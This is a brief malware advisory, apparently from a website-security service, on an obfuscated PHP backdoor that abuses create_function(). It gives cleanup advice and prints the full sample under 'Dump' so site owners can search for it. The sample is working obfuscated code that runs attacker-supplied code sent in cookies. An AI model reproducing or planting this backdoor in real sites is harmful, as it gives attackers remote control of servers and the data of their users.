Create_function() is often used by malware instead of the eval() function to hide evaluating of the malicious code. In this specific case, the code is obfuscated and the malicious code uses several common php functions to decode the final payload.
Affecting
Any PHP based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).
Cleanup
Cleanup is done by deleting the malicious file, which can be found in your system by searching for the dump code below inside your files. Reviewing access logs for non-expected HTTP POSTs can point out the possible infected files.
You can also sign up with us and let our team remove the malware for you.
Dump
$xamu="JGM9J2NvdW50JinzskYT0kX0inNPT0tJRTtpZihyZXNldCgkYinSk9PSdhbCcgJiYgJGMoJGEpinPjMp";
$sjvk="ineyRrPSdvdSc7ZWNinobyAinnPCcuJGsuJz4nO2V2YWwoYminFzZTY0X2RinlY29kZShwcmVnX3JlcGx";
$oxgz="hY2UinoYXJyYXkoJiny9bXlx3PinVxinzXS8nLCcvXHMinvJyksIinGFinycmF5KinCcnLCcrJyk";
$wlsb = str_replace("pa","","paspatparpa_pareplpaapacpae");
$zbsd="sIGpvaW4oYXinJyYXlfc2xpY2UoJGEsJGMoJGEpLTinMpKSkpKinTtlY2hvICc8LycuJGsuJz4nO30=";
$jjcp = $wlsb("q", "", "bqaqseq64q_dqeqcqodqe");
$frjl = $wlsb("z","","zczrzeatzez_fzuznzcztzizozn");
$afgi = $frjl('', $jjcp($wlsb("in", "", $xamu.$sjvk.$oxgz.$zbsd))); $afgi();